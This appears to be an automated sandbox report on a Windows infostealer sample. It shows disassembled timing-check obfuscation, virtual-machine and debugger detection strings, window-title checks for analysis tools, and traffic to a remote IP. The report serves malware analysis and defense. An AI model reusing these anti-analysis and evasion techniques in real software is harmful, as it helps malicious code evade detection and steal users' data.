Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C1E second address: 6EF0C4C instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FB6E8B0AEE6h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0AEDAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C4C second address: 6EF0C52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0C52 second address: 6EF0CDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, D9h 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d mov bh, 83h 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 and esp, FFFFFFF0h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB6E8B0AEDEh 0x0000001d sub eax, 2EAF33B8h 0x00000023 jmp 00007FB6E8B0AEDBh 0x00000028 popfd 0x00000029 popad 0x0000002a sub esp, 44h 0x0000002d jmp 00007FB6E8B0AEE6h 0x00000032 xchg eax, ebx 0x00000033 jmp 00007FB6E8B0AEE0h 0x00000038 push eax 0x00000039 pushad 0x0000003a push ebx 0x0000003b pushfd 0x0000003c jmp 00007FB6E8B0AEDCh 0x00000041 or esi, 741B5878h 0x00000047 jmp 00007FB6E8B0AEDBh 0x0000004c popfd 0x0000004d pop ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CDC second address: 6EF0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CE0 second address: 6EF0CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0CE4 second address: 6EF0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB6E8B0C7EAh 0x0000000f adc al, FFFFFFD8h 0x00000012 jmp 00007FB6E8B0C7EBh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB6E8B0C7F5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D20 second address: 6EF0D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D26 second address: 6EF0D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007FB6E8B0C7EDh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FB6E8B0C7EEh 0x00000017 push eax 0x00000018 pushad 0x00000019 movsx edi, cx 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 pop edx 0x00000026 jmp 00007FB6E8B0C7EAh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D68 second address: 6EF0D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0AEE5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D91 second address: 6EF0D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0D96 second address: 6EF0E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+24h], 00000000h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB6E8B0AEE5h 0x00000016 sub esi, 3C4C1AA6h 0x0000001c jmp 00007FB6E8B0AEE1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEE0h 0x00000028 xor al, 00000048h 0x0000002b jmp 00007FB6E8B0AEDBh 0x00000030 popfd 0x00000031 popad 0x00000032 lock bts dword ptr [edi], 00000000h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FB6E8B0AEDBh 0x00000040 add ax, 0A8Eh 0x00000045 jmp 00007FB6E8B0AEE9h 0x0000004a popfd 0x0000004b push eax 0x0000004c pop edx 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0E2B second address: 6EF0E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov esi, 247ACAABh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FB758F6DDE0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 mov ecx, edi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0E47 second address: 6EF0EEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e call 00007FB6E8B0AEE3h 0x00000013 mov cx, C84Fh 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB6E8B0AEE7h 0x00000022 or esi, 3DC5A00Eh 0x00000028 jmp 00007FB6E8B0AEE9h 0x0000002d popfd 0x0000002e mov cx, E117h 0x00000032 popad 0x00000033 mov cx, 77B3h 0x00000037 popad 0x00000038 pop ebx 0x00000039 jmp 00007FB6E8B0AEE6h 0x0000003e mov esp, ebp 0x00000040 jmp 00007FB6E8B0AEE0h 0x00000045 pop ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EEE second address: 6EF0EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EF2 second address: 6EF0EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6EF0EF6 second address: 6EF0EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308A4 second address: 6F308AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308AA second address: 6F308B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308B9 second address: 6F308BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F308BD second address: 6F30914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB6E8B0C7EEh 0x00000013 sbb cl, FFFFFFF8h 0x00000016 jmp 00007FB6E8B0C7EBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FB6E8B0C7F8h 0x00000022 and ecx, 1BCFFB58h 0x00000028 jmp 00007FB6E8B0C7EBh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30914 second address: 6F30919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F2090C second address: 6F20910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F20910 second address: 6F20916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30BC4 second address: 6F30BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov bx, 3560h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB6E8B0C7F0h 0x00000017 mov ax, 62C1h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30BEB second address: 6F30C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEDDh 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov edi, 0C1CB81Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 mov eax, edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30C56 second address: 6F30C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30C5A second address: 6F30C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30C6D second address: 6F30C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2785B46Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA097D second address: 6FA0981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0981 second address: 6FA0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0987 second address: 6FA098D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA098D second address: 6FA0991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0991 second address: 6FA09A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09A0 second address: 6FA09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09B7 second address: 6FA09E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6E8B0AEDCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09E3 second address: 6FA09E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09E9 second address: 6FA09ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09ED second address: 6FA09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, ax 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA09FF second address: 6FA0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEE9h 0x00000009 sbb esi, 4B6370C6h 0x0000000f jmp 00007FB6E8B0AEE1h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FB6E8B0AEE0h 0x0000001b jmp 00007FB6E8B0AEE5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB6E8B0AEDDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0A6F second address: 6FA0A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0A75 second address: 6FA0A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0A79 second address: 6FA0ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dl, byte ptr [ebp+14h] 0x0000000b jmp 00007FB6E8B0C7EFh 0x00000010 mov eax, dword ptr [ebp+10h] 0x00000013 jmp 00007FB6E8B0C7F6h 0x00000018 and dl, 00000007h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB6E8B0C7EAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0ABD second address: 6FA0AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0AC3 second address: 6FA0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0AC9 second address: 6FA0ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0ACD second address: 6FA0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FB6E8B0C7F9h 0x00000018 sbb ecx, 568A5906h 0x0000001e jmp 00007FB6E8B0C7F1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0B25 second address: 6FA0B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0B35 second address: 6FA0B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0B39 second address: 6FA0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB758EE0587h 0x0000000e pushad 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 call 00007FB6E8B0AEE4h 0x00000018 pop eax 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FB6E8B0AEDBh 0x00000020 xor ecx, 44903D9Eh 0x00000026 jmp 00007FB6E8B0AEE9h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ecx, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB6E8B0AEDAh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0B9D second address: 6FA0BB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0BB3 second address: 6FA0BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6FA0BB9 second address: 6FA0BBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F80DAD second address: 6F80DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSpecial instruction interceptor: First address: 14D1BDB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSpecial instruction interceptor: First address: 16AB5DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSpecial instruction interceptor: First address: 14D1C87 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSpecial instruction interceptor: First address: 16894FF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSpecial instruction interceptor: First address: 1714449 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00FD9980 rdtsc 2_2_00FD9980
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,2_2_00DF29FF
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZFttiy4Tt8.exe, 00000002.00000003.2181450137.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ZFttiy4Tt8.exeBinary or memory string: Hyper-V RAW
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ZFttiy4Tt8.exe, 00000002.00000003.2245160009.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2245507787.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2245681121.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2246724271.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000002.2285765840.00000000008D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile opened: NTICE
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile opened: SICE
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00FD9980 rdtsc 2_2_00FD9980
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: AProgram Manager
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.6:49720 -> 81.29.149.125:80

Mitre Att&ck Matrix

